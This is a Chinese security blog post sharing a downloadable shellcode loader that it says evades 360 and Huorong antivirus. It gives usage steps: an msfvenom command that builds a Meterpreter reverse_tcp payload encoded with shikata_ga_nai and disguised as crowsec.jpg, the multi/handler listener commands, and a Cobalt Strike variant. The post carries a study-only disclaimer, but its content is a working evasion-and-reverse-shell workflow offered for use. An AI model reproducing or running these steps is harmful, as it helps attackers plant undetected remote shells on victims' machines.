【工具分享】免杀360&火绒的shellcode加载器

✎ 阅读须知

乌鸦安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限，如转载或传播此文章，需保证文章的完整性，未经允许，禁止转载！

本文所提供的工具仅用于学习，禁止用于其他，请在24小时内删除工具文件！！！

【工具分享】免杀360&火绒的shellcode加载器

1. 免杀效果

该shellcode加载器目前可以过360&火绒，Windows Defender没戏。。。

代码和思路暂不开源！

你可以在我的GitHub上下载该工具：https://github.com/crow821/crowsec/tree/master/BypassAV_360_huornog

如果你访问GitHub困难，你可以在乌鸦安全公众号后台直接回复关键字：加载器 下载！

方法：生成msf或cs的shellcode原生格式，命名为crowsec.jpg（这个是写死的），将其和crowsec_shelllcodeBypass.exe（这个名字可以修改的）放在一个目录下，直接双击即可！

1.1 当前

1.2 半年前

这个数据已没有意义。

这个shellcode加载器工具是我在2021-06-21号做的，优化之后VT查杀为0/68，一个月之后我再去检查，甚至到现在去检查，当前的VT查杀依旧为0/68。

2021-06-21是能过火绒、360、Windows Defender(关闭自动发送可疑样本)

前几天在测试的时候，发现过不了Windows Defender，今天稍微优化了一下，发现还是过不了Windows Defender，主要原因是识别了msf的部分特征！！！

鉴于目前已经有了其他的免杀方案，所以在这里就把工具分享出来（🐶），至少还能过360和火绒。（放出来之后，基本上几小时就没用了，所以仅供参考！）。

查询时间：2022.01.19

3. 使用方法

3.1. msf上线

在这里使用msfvenon生成shellcode，为了好点的效果，这里使用shikata_ga_nai 编码器器对shellcode进行混淆编码，编码之后的shellcode并不是所有杀软都识别不出来，详情可以看我以前的文章：

老树开新花之shellcode_launcher免杀Windows Defender

 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 7 -b '\x00'  lhost=10.211.55.2 lport=1234  -f raw -o crowsec.jpg

使用msf进行监听：

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload  windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:1234

3.1.1 360

i

3.1.2 Windows Defender

被杀

3.1.3 火绒

3.2 Cobalt Strike上线

在这里只说思路，能够过火绒和360，但是不能过Windows Defender，同样的问题：特征出现在shellcode上面。

将文件保存为crowsec.jpg（下图是一个示例，主要是太累了，不想换了。。。）

image.png

现将生成的bin文件修改为png文件，然后双击上线操作

但是这里可以发现，当前的payload已经被标记特征，直接被杀，但是免杀360和火绒是不影响的。